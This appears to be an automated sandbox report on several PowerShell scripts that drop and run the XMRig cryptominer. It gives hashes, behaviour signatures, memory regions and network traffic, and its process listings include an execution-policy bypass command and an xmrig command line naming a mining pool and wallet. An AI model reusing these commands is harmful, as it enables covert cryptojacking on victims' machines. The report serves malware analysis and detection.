memory/1484-0-0x00007FFB5D213000-0x00007FFB5D215000-memory.dmp

memory/1484-6-0x0000019538750000-0x0000019538772000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sd4po5nh.yjq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1484-10-0x00007FFB5D210000-0x00007FFB5DCD2000-memory.dmp

memory/1484-11-0x00007FFB5D210000-0x00007FFB5DCD2000-memory.dmp

memory/1484-12-0x00007FFB5D210000-0x00007FFB5DCD2000-memory.dmp

memory/1484-14-0x00000195387F0000-0x0000019538802000-memory.dmp

memory/1484-15-0x00000195387E0000-0x00000195387EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2628-46-0x00000193685F0000-0x0000019368610000-memory.dmp

memory/2628-47-0x0000019368640000-0x0000019368660000-memory.dmp

memory/2628-48-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/1484-49-0x00007FFB5D210000-0x00007FFB5DCD2000-memory.dmp

memory/1484-51-0x00007FFB5D213000-0x00007FFB5D215000-memory.dmp

memory/2628-50-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-53-0x0000019368660000-0x0000019368680000-memory.dmp

memory/2628-54-0x0000019368680000-0x00000193686A0000-memory.dmp

memory/1484-52-0x00007FFB5D210000-0x00007FFB5DCD2000-memory.dmp

memory/2628-55-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-56-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-58-0x0000019368680000-0x00000193686A0000-memory.dmp

memory/2628-57-0x0000019368660000-0x0000019368680000-memory.dmp

memory/2628-59-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-60-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-61-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-62-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-63-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-64-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-65-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-66-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-67-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-68-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-69-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-70-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-71-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-72-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-73-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-74-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-75-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-76-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-77-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-78-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-79-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-80-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-81-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-82-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-83-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-84-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-85-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-86-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-87-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-88-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-89-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-90-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-91-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-92-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-93-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-94-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-95-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-96-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-97-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-98-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-99-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-100-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-101-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-102-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-103-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-104-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-105-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-106-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-107-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-108-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-109-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-110-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-111-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-112-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-113-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-114-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-115-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-116-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-117-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

memory/3296-0-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_du5v2dzf.pf0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3296-1-0x00000201404C0000-0x00000201404E2000-memory.dmp

memory/3296-11-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3296-12-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3296-13-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3296-14-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3296-15-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/3296-16-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3296-17-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:25

Platform

win10v2004-20240611-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4296,i,3595107284059830391,18018199024659337217,262144 --variations-seed-version --mojo-platform-channel-handle=4064 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1036,i,3595107284059830391,18018199024659337217,262144 --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 2.16.34.73:443 www.bing.com tcp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 73.34.16.2.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

memory/840-0-0x00007FFCB0DB3000-0x00007FFCB0DB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyqcan5j.uj3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/840-10-0x000001E140580000-0x000001E1405A2000-memory.dmp

memory/840-11-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/840-12-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/840-14-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/840-15-0x000001E1405F0000-0x000001E140602000-memory.dmp

memory/840-16-0x000001E125E10000-0x000001E125E1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2204-47-0x00000157EA860000-0x00000157EA880000-memory.dmp

memory/2204-48-0x00000157EC060000-0x00000157EC080000-memory.dmp

memory/2204-49-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/840-50-0x00007FFCB0DB3000-0x00007FFCB0DB5000-memory.dmp

memory/840-51-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/2204-52-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/840-53-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/2204-55-0x00000157EC080000-0x00000157EC0A0000-memory.dmp

memory/2204-54-0x00000157EC0A0000-0x00000157EC0C0000-memory.dmp

memory/2204-56-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/840-57-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/2204-58-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-60-0x00000157EC080000-0x00000157EC0A0000-memory.dmp

memory/2204-59-0x00000157EC0A0000-0x00000157EC0C0000-memory.dmp

memory/2204-61-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-62-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-63-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-64-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-65-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-66-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-67-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-68-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-69-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-70-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-71-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-72-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-73-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-74-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-75-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-76-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-77-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-78-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-79-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-80-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-81-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-82-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-83-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-84-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-85-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-86-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-87-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-88-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-89-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-90-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-91-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-92-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-93-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-94-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-95-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-96-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-97-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-98-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-99-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-100-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-101-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-102-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-103-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-104-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-105-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-106-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-107-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-108-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-109-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-110-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-111-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-112-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-113-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-114-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-115-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-116-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-117-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-118-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-119-0x00007FF668250000-0x00007FF668E83000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:01

Platform

win11-20240611-en

Max time kernel

1791s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/4828-0-0x00007FFD62DB3000-0x00007FFD62DB5000-memory.dmp

memory/4828-1-0x00007FFD62DB0000-0x00007FFD63872000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zeii520z.rfz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4828-10-0x000001CC44E50000-0x000001CC44E72000-memory.dmp

memory/4828-11-0x00007FFD62DB0000-0x00007FFD63872000-memory.dmp

memory/4828-12-0x00007FFD62DB0000-0x00007FFD63872000-memory.dmp

memory/4828-14-0x000001CC44EE0000-0x000001CC44EF2000-memory.dmp

memory/4828-15-0x000001CC44ED0000-0x000001CC44EDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3160-46-0x0000022D7F720000-0x0000022D7F740000-memory.dmp

memory/3160-47-0x0000022D7F750000-0x0000022D7F770000-memory.dmp

memory/3160-48-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/4828-49-0x00007FFD62DB0000-0x00007FFD63872000-memory.dmp

memory/4828-50-0x00007FFD62DB3000-0x00007FFD62DB5000-memory.dmp

memory/3160-52-0x0000022D7F790000-0x0000022D7F7B0000-memory.dmp

memory/3160-51-0x0000022D7F770000-0x0000022D7F790000-memory.dmp

memory/3160-53-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-54-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-55-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-57-0x0000022D7F790000-0x0000022D7F7B0000-memory.dmp

memory/3160-56-0x0000022D7F770000-0x0000022D7F790000-memory.dmp

memory/3160-58-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-59-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-60-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-61-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-62-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-63-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-64-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-65-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-66-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-67-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-68-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

